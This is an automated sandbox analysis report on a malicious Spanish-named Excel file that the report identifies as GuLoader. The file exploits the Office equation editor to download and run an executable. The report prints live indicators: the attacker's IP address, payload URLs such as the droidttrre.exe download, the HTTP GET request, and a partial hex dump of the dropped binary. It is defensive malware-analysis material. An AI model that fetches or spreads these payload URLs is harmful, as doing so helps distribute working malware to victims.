Edit tour

Windows Analysis Report
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Overview

General Information

Sample Name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
Analysis ID:	635062
MD5:	3fed4357a9a31f6d784d90e0e2828cef
SHA1:	b10fe00a3142c331aa805a78b5e01e9fa73d9c6b
SHA256:	bc03e79179795e31ba88934475f0746f25a7382a157ab005a54cae03b83c797d
Tags:	xlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Machine Learning detection for sample

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Binary contains a suspicious time stamp

PE file contains more sections than normal

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3004 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1112 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

venxajlddf.exe (PID: 2944 cmdline: C:\Users\user\AppData\Roaming\venxajlddf.exe MD5: 2A384E15F8133C8B9ECEFA4DA1D96CEE)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin\u000b\u05c8"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x291:$s1: <legacyDrawing r:id=" 0x2b9:$s2: <oleObject progId=" 0x30b:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 2.56.57.22, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1112, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin\u000b\u05c8"}

Multi AV Scanner detection for submitted file

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Virustotal: Detection: 54%	Perma Link
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Metadefender: Detection: 22%	Perma Link
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	ReversingLabs: Detection: 58%

Antivirus / Scanner detection for submitted sample

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Avira: detected

Antivirus detection for URL or domain

Source: http://2.56.57.22/droidttrre.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://2.56.57.22/droidttrre.exe

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	ReversingLabs: Detection: 38%

Machine Learning detection for sample

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Joe Sandbox ML: detected

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 2.56.57.22 Port: 80

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: System.IO.FileSystem.Watcher.ni.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040699E FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040290B FindFirstFileW,

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D05C4 URLDownloadToFileW,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0557 LoadLibraryW,URLDownloadToFileW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D060F WinExec,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0571 URLDownloadToFileW,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04D7 LoadLibraryW,URLDownloadToFileW,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D062F ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04A2 ExitProcess,

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 2.56.57.22:80

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 2.56.57.22:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin

Source: Joe Sandbox View

ASN Name: GBTCLOUDUS GBTCLOUDUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 24 May 2022 18:13:44 GMTAccept-Ranges: bytesETag: "abe39719a6fd81:0"Server: Microsoft-IIS/10.0Date: Fri, 27 May 2022 10:02:27 GMTContent-Length: 1449584Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 04 00 00 5b e9 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 05 00 68 2d 02 00 00 00 00 00 00 00 00 00 50 ff 15 00 20 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 2d 02 00 00 b0 05 00 00 2e 02 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /droidttrre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 2.56.57.22Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22

Source: EQNEDT32.EXE, 00000002.00000002.975278743.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comz equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.975278743.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exe
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exeP
Source: EQNEDT32.EXE, 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exej
Source: EQNEDT32.EXE, 00000002.00000002.975219877.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exeooC:
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: folder-publicshare.png.4.dr	String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: venxajlddf.exe, 00000004.00000000.963495241.000000000040A000.00000008.00000001.01000000.00000004.sdmp, venxajlddf.exe, 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://s2.symcb.com0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com05
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcd.com0&
Source: avutil-54.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://www.avast.com0/
